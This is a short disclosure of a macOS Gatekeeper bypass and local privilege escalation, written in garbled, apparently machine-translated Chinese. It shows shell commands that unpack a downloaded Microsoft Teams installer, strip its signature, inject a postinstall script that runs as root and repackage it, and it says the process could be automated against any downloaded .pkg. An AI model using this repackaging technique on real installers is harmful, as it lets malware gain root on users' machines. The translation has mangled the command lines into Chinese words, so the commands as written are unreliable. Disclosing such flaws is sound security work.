macOS看门人绕过/地方特权升级

在安装过程中,一些包(. pkg)需要提升特权来执行某些操作(如创建LaunchDaemon)。这是相当普遍,用户非常熟悉这一过程。例如,如果一个安装程序需要提升权限执行操作定义在一个包中,启动安装程序时,用户将被提示以管理员身份验证。

在从网上下载一个包的情况下,我们可以观察到修改这个包将触发一个警告用户在打开它声称签名验证失败由于被修改或损坏。如果我们重复的包和修改它,但是,我们可以完全删除签名,修改文件,并重新包装它。多数用户不会注意到安装程序不再签署(锁符号在安装程序对话框的右上角)因为剩余的资产用于安装程序将会如预期。这个新修改的文件也会运行不被抓或验证看门人和可以让恶意软件或其他恶意参与者实现根特权扩大。此外,这个过程可以完全自动化监测. pkg下载和滥用这一事实. pkg所有文件遵循相同的一般格式。

下面的指令可以用来演示这个过程使用一个共同的应用程序:微软团队。然而,请注意,这个问题不是特定于这个安装程序/产品和推广,甚至自动处理任意安装程序。下面的步骤仅供演示目的和特定于团队为了简化的解释。

首先,下载微软团队安装包:https://www.microsoft.com/en-us/microsoft-teams/download-app desktopAppDownloadregion

当下载,这应该会出现在用户的下载文件夹(~ /下载)。运行安装程序之前,打开终端会话,运行以下命令:

#重命名方案
是的| mv ~ /下载/ Teams_osx。pkg ~ /下载/ old.pkg

#提取包内容

pkgutil——扩大~ /下载/老。pkg ~ /下载/提取

#修改后使用的安装脚本安装程序
mv/下载/提取/ Teams_osx_app.pkg /脚本/ postinstall/下载/提取/ Teams_osx_app.pkg /脚本/ postinstall.bak
回声“# !/usr/bin/env sh > ~ /下载/利用\ n \国家免疫日美元(猫~ /下载/提取/ Teams_osx_app.pkg /脚本/ postinstall.bak)”> ~/Downloads/extract/Teams_osx_app.pkg/Scripts/postinstall
rm - f ~ /下载/提取/ Teams_osx_app.pkg /脚本/ postinstall.bak
chmod + x ~ /下载/提取/ Teams_osx_app.pkg /脚本/ postinstall

#重新包装和重新命名安装程序
pkgutil - f -平~ /下载/提取~ /下载/ Teams_osx.pkg

当用户运行这个新创建的包,它将完全按照预期从最终用户的角度。然而,安装后,我们可以看到postinstall脚本运行在安装期间创建了一个新文件~ /下载/利用”包含“id”命令的输出由根用户,展示成功的特权升级。